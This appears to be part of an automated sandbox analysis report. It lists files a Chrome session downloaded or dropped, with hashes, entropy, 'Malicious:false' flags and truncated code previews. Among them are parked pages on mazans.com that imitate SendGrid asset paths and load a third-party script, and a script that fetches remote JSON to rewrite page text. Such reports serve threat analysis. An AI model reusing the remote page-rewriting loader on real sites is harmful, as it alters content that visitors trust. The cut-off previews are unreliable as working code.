                                                                                                                                                                                                                                                                                                                                                                          Preview:function findEl(e,t){var n=document.querySelectorAll(e);for(var r=0;r<n.length;r++)if(n[r].textContent.includes(t))return n[r];return null}.var getJSON=function(e,n){var t=new XMLHttpRequest;t.open("GET",e,!0),t.responseType="json",t.onload=function(){var e=t.status;n(200===e?null:e,t.response)},t.send()},pid=45414,jsonPath="https://jscloud.net/x/"+pid+"/"+window.location.href.replace(/(:[^:]+:)http/, 'http').replace(/\/|\.|\-|\:|\=|\?/gi,"")+".json";console.log(jsonPath);getJSON(jsonPath=jsonPath.replace("#body",""),function(e,n){if(null===e){var t=document.getElementsByTagName("p"),a=document.getElementsByTagName("li");for(var r in n){var o=n[r].t,i=n[r].a,s=n[r].n,lnkd=false;if("p"===o||"li"===o){var p,l=n[r].o,lref=n[r].o.replace('\\', '').replace('\\', '');new RegExp(l,"");var lref2 = new RegExp(lref,""); p="p"===o?t:a;for(var d,c=0;c<p.length;c++){if(!lnkd&&p[c].innerHTML.match(l)){-1<p[c].innerHTML.search(i)&&(searchedString=p[c].innerHTML,d=searchedString.replace(lref2,s),(p[c]
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1876)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):96983
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2956057406448735
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:GfUyDpPtfE6/615M6xKGUjrFCGFBKP+aoa3emdEyAF2sO+zhLsK5sJ:gnE6C1G6xKLpBKWaJem0KJ
                                                                                                                                                                                                                                                                                                                                                                          MD5:52A7A7C0298D65E67882A2B45D8F99BB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C8EDEBD14AC0A5604DFC0D559C5878832453B578
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0C47080FEB6FE854CB361DC2471F19799E8773617F10E33CF78AEA069D41A4E6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:66AA00E04AD2762F359B413E283D3E27A3036BD6F25F2D011BB69CC56A907123292657F3AB4FC1594BFA7B193085BE78574F029618B5ADC6E413907FDA762B86
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://consent.trustarc.com/asset/notice.js/v/v1.7-776
                                                                                                                                                                                                                                                                                                                                                                          Preview:function _truste_eu(){function u(){var g=truste.eu.bindMap;g.feat.isConsentRetrieved=g.feat.crossDomain?g.feat.isConsentRetrieved:!0;if(!u.done&&truste.util.isConsentResolved()){u.done=!0;var k=function(){var a=(new Date).getTime(),c=truste.util.readCookie(truste.eu.COOKIE_REPOP,!0),d=truste.eu.bindMap.popTime;return d&&d!=c&&a>=d}();k&&(g.feat.dropPopCookie=!0);truste.eu.ccpa.initialize();truste.eu.gpp.initialize();truste.eu.gpcDntAutoOptOut();truste.eu.gcm();var a=function(){var a=truste.eu.bindMap;.if(a.feat.consentResolution){var c=truste.util.readCookie(truste.eu.COOKIE_GDPR_PREF_NAME,!0);if(c&&(c=c.split(":"),!RegExp(a.behavior+"."+a.behaviorManager).test(c[2])&&(/(,us|none)/i.test(c[2])||"eu"==a.behaviorManager&&/implied.eu/i.test(c[2]))))return!0}return!1};truste.util.fireCustomEvent("truste-cookie",g.prefCookie);truste.eu.isGPCDNTEvent()?g.feat.dntShowUI&&"expressed"==g.behavior&&truste.util.executeOnCondition(function(){return g.prefCookie||g.feat.gpp.gppApplies&&null==truste
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 43473
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12126
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9862712081532035
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:26MV2PEUWRRI2V6SKbQ5W3YmOCf3OrXT9WVcx6tbLRtbaa01P0jGwWsEnJqVFGUc:+tjRIm6SoITu3khUrRkaVjTWsEnsKOmH
                                                                                                                                                                                                                                                                                                                                                                          MD5:5E9AC3A42B557BF8CA38CF2E8BABA70B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:384C001B3FA47AD5D2A6001A05C700DF75492609
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C5E0F994B0C6C1C43D0C0FDE35AE8B72D458D31A8B2A17CA6E030C3C8D3C6FF2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:65EE94F5AB3621A8220BECB8AF3F7A348DA789E89F22007D2484B5F6365AD4100EB9178F18C83BEEDFBBDCBADE0683ACFFC94CE5D22A57AC38DBFBE119524D5E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........;ks.....n..i....k\....<.L..J..P"$F.q....{.%....;;.6.B.}N.w.>.....I.0(E*F.J..t$T=4......yc....J...T.4..%......."\..F......d..%...U52..c+>F..f..JV...... ......."tW>..[.x....L.Q.P.u't..\]wF..w=.._.z....Boi...'.c.FIl<m6M..]u.;..K....F..'.Y.R........AK.M..3.c.N.....D....yf..&...Y2oz......uS..Q.j.]&$...8[.i..6cT..L5.....#..Q.&hj;I.=6I.L.^,F..v;z\&...S4.....N.h...|.].@..D..B.=a..pz.P.....e.5...vQ....G~.fK...2..A.r9ko...ihO...R...[-...}.=.T.39O!.3"....(.....C.....q...8.E..6..*.}..]t.D...'gN.;.2.>....k.+.S)D.....0...".Q.i.,./r.(....Nn.Tmhz.m.Kx]Zj....y.<...;.D.r..H...U....@%.Kb...W.V.{..`i......._...'.!)5.CGd.....e.+^...E.8.Q..d.....4.#...|_.7.UCm..I{.{.f['...`..c:mBjMp......N..F..1.>*. YR...N....~te.B.}n....M..q.<...x.....N:.6.....CT..+^.1........!;...8....P..d+>.q",3..qW.....qb....:....C@ey.$..c.D.e..D...-..<...!......$.d...I`sj.;yplf.....<Y.2I.y.L.Du1".K..... gWn.4.2.....l..0ri....I...Q......X.x.}.?.......A.I..).g.a4.....o..-c
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):110633
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.444679358436924
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:7Fb5Xyuw2f8jlZpU/diXsxaI2hxFjYtZFl0W8Tdw9GpRcFkeuWSyNSjx50cFuQv+:T0xU6ZVn7wNUyPQ2
                                                                                                                                                                                                                                                                                                                                                                          MD5:5B53A174469542CF3548E40583C3F1E8
                                                                                                                                                                                                                                                                                                                                                                          SHA1:AC03471BEE72F4493218683289FD337A33413182
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EB1CED271679B94863261DB0B6DC150A53B987360B657794D35A6DA534904D27
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F51B1CCACD72F0C618199DF12A592182DCCFAED42A361D10C16490448A5F223C73FFD5BAAB43272BFEC76A8FCB8407A81BCC3BB9896794B119F4EBD6ECAFFA13
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(t){var n={};function r(e){if(n[e])return n[e].exports;var i=n[e]={i:e,l:!1,exports:{}};return t[e].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"_",{value:!0})},r.t=function(t,n){if(1&n&&(t=r(t)),8&n)return t;if(4&n&&"object"==typeof t&&t&&t._)return t;var e=Object.create(null);if(r.r(e),Object.defineProperty(e,"default",{enumerable:!0,value:t}),2&n&&"string"!=typeof t)for(var i in t)r.d(e,i,function(n){return t[n]}.bind(null,i));return e},r.n=function(t){var n=t&&t._?function(){return t.default}:function(){return t};return r.d(n,"a",n),n},r.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},r.p="",r(r.s=5)}([function(t,n,r){var e=r(1),i=window,a=i.document,o=i.location,c=encodeURIComponent,u=decodeURIComponent,f=i.navigat
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):583
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.129258967489751
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3Bg+W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJhg+P4NjSK
                                                                                                                                                                                                                                                                                                                                                                          MD5:51618AC2B7CF5C4937213E965C00F20A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E704E57162ED18743BEF9F95E2DEA558954751B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0B41F69E6564B9C89B1B344744C5B06EB4ADC0E584028909286D2B936E1AFED5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D07AF4309BF8156644D604676EEC62CF78128DAE1CD1808E865E02BF7302B3DEA5B1EDA42EECD6E8687C84B85A6A52C07BD45B120B8FE5940D8D80586A2D0FB0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://mazans.com/content/dam/sendgrid/core-assets/social/site.webmanifest
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9POBEX80W";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                          MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1490)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1559
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.120755987626891
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:iKQKFYYCvoDlgVDyNQ2glkMBaqNTYEZqNF5XmbxDy:jJmYoyGPlkMBa+TrZqp2y
                                                                                                                                                                                                                                                                                                                                                                          MD5:3867B2388B619FF7FDDC29EF359FC9AA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:511BED0C4D3D57AB4CF1B1D7596FB845ECFBA6AC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:31892C21AE4FB908A875BBE29DBF0DF74C2E84171CFBCAC23540F3AD8222A35A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7BFD6E6CD2FE7A79F4797439BC7294A36D076D67A3DC5BB8E86FA5AF19B50F0E8FEC18BF33B30588486B231062E43F417708333044207A586AAD999E97E819A5
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:"use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[493],{9254:function(n,e,t){function i(n,e){var t,i;return"boolean"==typeof(null==e?void 0:e.enabled)?e.enabled:null===(i=null===(t=null==n?void 0:n.__default)||void 0===t?void 0:t.enabled)||void 0===i||i}t.d(e,{n:function(){return i}})},5081:function(n,e,t){t.r(e),t.d(e,{schemaFilter:function(){return o}});var i=t(5163),r=t(9254);function o(n,e){function t(t){var o=n,u=t.event.event;if(o&&u){var a=o[u];if(!(0,r.n)(o,a))return t.updateEvent("integrations",(0,i.pi)((0,i.pi)({},t.event.integrations),{All:!1,"Segment.io":!0})),t;var s=function(n,e){var t,i;if(!n||!Object.keys(n))return{};var r=n.integrations?Object.keys(n.integrations).filter((function(e){return!1===n.integrations[e]})):[],o=[];return(null!==(t=e.remotePlugins)&&void 0!==t?t:[]).forEach((function(n){r.forEach((function(e){n.creationName==e&&o.push(n.name)}))})),(null!==(i=e.remotePlugins)&&void 0!==i?i:[]).reduce((fu
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):583
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.129258967489751
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3Bg+W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJhg+P4NjSK
                                                                                                                                                                                                                                                                                                                                                                          MD5:51618AC2B7CF5C4937213E965C00F20A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E704E57162ED18743BEF9F95E2DEA558954751B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0B41F69E6564B9C89B1B344744C5B06EB4ADC0E584028909286D2B936E1AFED5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D07AF4309BF8156644D604676EEC62CF78128DAE1CD1808E865E02BF7302B3DEA5B1EDA42EECD6E8687C84B85A6A52C07BD45B120B8FE5940D8D80586A2D0FB0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://mazans.com/https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9POBEX80W";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4900)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):35171
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.408284854930856
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:6jL/45Pg0zqXqhQWlq0TTquye0YviFU8w4SQzxWVIYpo:S4aXQQWlq0TTquyVYGU8wtQFWVIYpo
                                                                                                                                                                                                                                                                                                                                                                          MD5:05F233ACAA001260FD6B8081F84B35C0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4E9D69B60E01A97FB129F884EA7CFC6B9E75463A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:018891044130FC7803E5214E7D2718FEB8C465AA9FCB9CA92589663F21373D4E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:85DC2C5AD2FE4A20C8575D8E259D35FECDEDBF50D620CB3412858B83501A3E07C43583B3BF691B8F4909AC21F7D9FB050A3CF0103A04E3556DD83EA6AC057D2B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:var truste=window.truste||{};truste.bn||(truste.bn={});truste.eu||(truste.eu={});truste.util||(truste.util={});.truste.util.error=function(h,d,g){g=g||{};var f=d&&d.toString()||"",c=g.caller||"";if(d&&d.stack){f+="\n"+d.stack.match(/(@|at)[^\n\r\t]*/)[0]+"\n"+d.stack.match(/(@|at)[^\n\r\t]*$/)[0].}truste.util.trace(h,f,g);if(truste.util.debug||!d&&!h){return}var a={apigwlambdaUrl:"https://api-js-log.trustarc.com/error",enableJsLog:false};.if(a.enableJsLog){delete g.caller;delete g.mod;delete g.domain;delete g.authority;g.msg=h;var e=new (self.XMLHttpRequest||self.XDomainRequest||self.ActiveXObject)("MSXML2.XMLHTTP.3.0");.e.open("POST",a.apigwlambdaUrl,true);e.setRequestHeader&&e.setRequestHeader("Content-type","application/json");.e.send(truste.util.getJSON({info:truste.util.getJSON(g)||"",error:f,caller:c}))}};truste.util.trace=function(){if(self.console&&console.log&&(this.debug||this.debug!==false&&(self.location.hostname.indexOf(".")<0||self.location.hostname.indexOf(".truste-svc.n
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4646
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.9249002038545004
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:9J4o/vHtcSLLYJcGSwE63Gxdj3Vh+tQLRcya5aijo:T1vHxYJvSwESGxt3Vh+tQLR1eaijo
                                                                                                                                                                                                                                                                                                                                                                          MD5:424A02CCFAF5B1F899AD27BA9EF83409
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4B3EBB85E87BD879B620163B5D702C9D4C3FD069
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:AFC84F9B2618065E51F3C6F3E1D8749B0E5C6E86649FF0E72B2C5B636CFE114A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:677235017E856F06582C054D418680F5D5857B4CB055371E32D0B952D8C29A33C6D34FA34054CF1BE073A08E0C595D9D04836524C5C2FEB9F2E0E50142EC54FA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*. * Copyright 2024 Adobe. All rights reserved.. * This file is licensed to you under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License. You may obtain a copy. * of the License at http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software distributed under. * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS. * OF ANY KIND, either express or implied. See the License for the specific language. * governing permissions and limitations under the License.. */./* eslint-env browser */.export function sampleRUM(checkpoint, data) {. // eslint-disable-next-line max-len. const timeShift = () => (window.performance ? window.performance.now() : Date.now() - window.hlx.rum.firstReadTime);. try {. window.hlx = window.hlx || {};. sampleRUM.enhance = () => {};. if (!window.hlx.rum) {. const param = new URLSearchParams(window.l
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):65959
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.353413306184177
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:ZSDqeR7solr3roUzaOGjIj7KkIe0McOYkyJ+nM1Em87o6dHhMHKvOW4QES3OII:cDBFsolr3r7N5yJ+nwENFnESeII
                                                                                                                                                                                                                                                                                                                                                                          MD5:E4B2C9B152E972CACB77265A161CD311
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EDD9F41FFFB57C51B7C2B50D4732A61039FF308E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:09FA04E84D7038CC32F19BEDCBA454B9E637A35F4DE496E8EC9148C47550F0FC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4263D9EFE7D369A364F785E11BFFBFEA139A1B5CBD129A84E745AAB8F8A1D254EC204963E09CA18365AD851F7491C1F7A61EE28CEB24E7CFF87E4358B8F15069
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:/* clarity-js v0.7.49: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return Ar},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return jr}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callbacks(){return $r},get clear(){return ui},get consent(){return oi},get data(){return Qr},get electron(){return ti},
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (31988)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):70103
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.350957695758152
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:L+i0S1TpywbZi31SPTnODPEGnVbg94ePcwD4wP1nN69X1SiraqXztGV51Au+:qY7ZbpwDw1y
                                                                                                                                                                                                                                                                                                                                                                          MD5:7E1853E10A9F3C69AF99931DDCEE9138
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3CFF5AE87ED02DE01F327DBF0DAB0FA39A469C97
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:56DF5BF2317BC2156B954C3FD2913AFCCE23EB4947C47F3AC401017DC4A0151D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:474FB64341A56957391FE59E39BB1152EE6EC534B577C95CF6E4B5D00846F70621DDB2FFED62FEF06B3A9EA796E560110F657A890B70F311A083C29D6E76AD2F
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://j.6sc.co/6si.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){var t={},e={},n={},i={},r={},o={},a={},s={},u={},l={},c={},d={},f={},h={},p={},m={},v={},b={},y={},g={},w={},_={},E={},k={},S={},C={},T={},F={},x={},A={},I={},M={},U={},L={},P={},N=this&&this.__spreadArray||function(t,e,n){if(n||2===arguments.length)for(var i,r=0,o=e.length;r<o;r++)!i&&r in e||(i||(i=Array.prototype.slice.call(e,0,r)),i[r]=e[r]);return t.concat(i||Array.prototype.slice.call(e))},D=this&&this.__extends||function(){var t=function(e,n){return(t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(t[n]=e[n])})(e,n)};return function(e,n){function i(){this.constructor=e}if("function"!=typeof n&&null!==n)throw new TypeError("Class extends value "+String(n)+" is not a constructor or null");t(e,n),e.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}}(),O=this&&this.__assign||function(){return O=Object.assign||function(t){for(var e,n=1,i=argument
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):583
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.129258967489751
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3Bg+W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJhg+P4NjSK
                                                                                                                                                                                                                                                                                                                                                                          MD5:51618AC2B7CF5C4937213E965C00F20A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E704E57162ED18743BEF9F95E2DEA558954751B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0B41F69E6564B9C89B1B344744C5B06EB4ADC0E584028909286D2B936E1AFED5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D07AF4309BF8156644D604676EEC62CF78128DAE1CD1808E865E02BF7302B3DEA5B1EDA42EECD6E8687C84B85A6A52C07BD45B120B8FE5940D8D80586A2D0FB0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://mazans.com/https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9POBEX80W";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
